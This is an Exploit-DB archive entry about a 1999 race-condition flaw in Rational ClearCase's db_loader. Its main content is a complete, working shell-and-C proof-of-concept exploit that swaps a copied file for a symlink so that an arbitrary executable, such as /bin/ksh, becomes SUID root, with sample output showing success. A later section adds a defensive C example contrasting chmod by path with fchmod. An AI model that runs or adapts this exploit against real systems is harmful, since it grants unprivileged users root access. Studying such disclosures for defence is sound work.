
Rational Software ClearCase for Unix 3.2 - ClearCase SUID

02 May 1999. Reported by Mudge. Type: exploitdb. Source: www.exploit-db.com

Rational Software ClearCase has a vulnerability allowing unprivileged users to set SUID root files.

source: https://www.securityfocus.com/bid/538/info

Rational Software's ClearCase product includes a vulnerability whereby an unprivileged user can have any readable executable set to SUID root. A 1.5 meg file is copied and then chmod'ed to SUID; while this file is being copied, it can be unlinked and replaced with another, so the SUID permission change is applied to the replacement.

Sample output:
> ./clear_waste.sh /bin/ksh

Clear Case proof of concept exploit code - [email protected] 2.5.1999
one beer please!

creating race grinder....
created!

compiling race grinder...
compiled! Launching attack.... be patient

Looks succesfull!
-r-sr-xr-x 2 bin bin 186356 Jan 21 1998 /bin/ksh

don't forget to get rid of /var/tmp/cleartest 

#!/bin/sh
#
# This is sample code that takes advantage of a race condition in 
# Pure Atria's Clear Case db_loader program. The program will retain
# ownership of the file pointed to on the command line and have
# the clear case db_loader change the permissions to SUID
#  [email protected]  2.5.1999
#
RACE_PROG=./clear_race
RACE_CODE=./clear_race.c
# you probably need to change the following to reflect your
# system and setup
#NICE=/usr/bin/nice
CC=/usr/local/bin/gcc
DB_LOADER=/usr/atria/sun5/etc/db_loader
RM=/bin/rm
LS=/bin/ls
MKDIR=/bin/mkdir
# you need to own the DEST DIR so you can delete files that you don't
# directly own
DEST_DIR=/var/tmp/cleartest.$$

if [ "$#" -ne "1" ] ; then
  echo "usage: `basename $0` file_to_make_suid"
  exit
fi

TARGET=$1

if [ ! -f ${TARGET} ] ; then
  echo "target file must exist"
  exit
fi

echo
echo "Clear Case proof of concept exploit code - [email protected] 2.5.1999"
echo " one beer please!"
echo

${MKDIR} ${DEST_DIR}
if [ $? -gt 0 ] ; then
  echo "go get rid of ${DEST_DIR} and try again..."
  exit
fi

cd ${DEST_DIR}

# create the race runner
echo "creating race grinder...."
cat > ${RACE_CODE} << FOEFOE
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>

main(int argc, char *argv[])
{
  struct stat statbuf;

  printf("%d\n", argc);

  if (argc != 2){
    printf("bzzzzt! - wrong usage\n");
    exit(0);
  }

  while (1){
    if (stat("./db_dumper", &statbuf) == 0){
      unlink("./db_dumper");
      symlink(argv[1], "./db_dumper");
      exit(0);
    }
  }
}
FOEFOE
echo "created!"
echo

# compile it
echo "compiling race grinder..."
${CC} -O2 -o ${RACE_PROG} ${RACE_CODE}

if [ ! -f ${RACE_PROG} ] ; then
  echo "compile failed?"
  ${RM} -f ${RACE_CODE}
  exit
fi

echo "compiled! Launching attack.... be patient"
echo


${RACE_PROG} ${TARGET} &
# let us give the progie a second or two to load up and get the runtime
# crap set
sleep 2 

#${NICE} -n 2 ${DB_LOADER} ${DEST_DIR} > /dev/null 2>&1
# if you keep failing try the above and potentially increase the nice value
${DB_LOADER} ${DEST_DIR} > /dev/null 2>&1

if [ -u ${TARGET} ] ; then
  echo "Looks succesfull!"
  ${LS} -l ${TARGET}
  echo
  echo "don't forget to get rid of ${DEST_DIR}"
  echo
  exit
fi

echo "doesn't look like it worked... "
echo "try again - after all it's a race condition!"
echo "don't forget to get rid of ${DEST_DIR}"
echo
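
The flaw described above is a path-based chmod after a long copy into a directory the caller controls. The following is an added example, not part of the original advisory or of ClearCase: it contrasts chmod() by path with fchmod() on the installer's own descriptor. The function name, the temp directory and the "victim" file are hypothetical, the mid-copy swap is simulated in-process, and mode 0755 stands in for the SUID mode.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-in for the race window: while the copy is in progress,
 * the directory owner replaces the new file with a symlink to `victim`. */
static int swap_for_symlink(const char *dst, const char *victim) {
    return unlink(dst) == 0 && symlink(victim, dst) == 0;
}

/* Installs <tmpdir>/db_dumper with `mode`, letting the swap happen mid-copy.
 * use_fd == 0: chmod() by path after the copy (the flawed pattern).
 * use_fd == 1: fchmod() on the descriptor the installer opened itself.
 * Returns the permission bits the *victim* file ends up with, or -1. */
int victim_mode_after_install(int use_fd, mode_t mode) {
    char dir[] = "/tmp/toctou_demo.XXXXXX", dst[64], victim[64];
    struct stat st;
    int fd, v, rc;

    if (!mkdtemp(dir)) return -1;
    snprintf(dst, sizeof dst, "%s/db_dumper", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if ((v = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600)) < 0) return -1;
    fchmod(v, 0600);                       /* known starting mode */
    close(v);

    /* O_EXCL|O_NOFOLLOW: refuse a pre-planted file or symlink at dst. */
    fd = open(dst, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0 || write(fd, "payload", 7) != 7) return -1;
    if (!swap_for_symlink(dst, victim)) return -1;

    /* chmod(path) resolves the name again and follows the symlink;
     * fchmod(fd) acts on the inode that was actually written. */
    rc = use_fd ? fchmod(fd, mode) : chmod(dst, mode);
    close(fd);
    if (rc != 0 || stat(victim, &st) != 0) return -1;

    unlink(dst); unlink(victim); rmdir(dir);
    return (int)(st.st_mode & 07777);
}

int main(void) {
    printf("path chmod -> victim mode %o\n", victim_mode_after_install(0, 0755));
    printf("fd fchmod  -> victim mode %o\n", victim_mode_after_install(1, 0755));
    return 0;
}
```

With the path-based call the victim file picks up the new mode; with fchmod() it keeps its original 0600 because the permission change stays bound to the inode the installer created.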
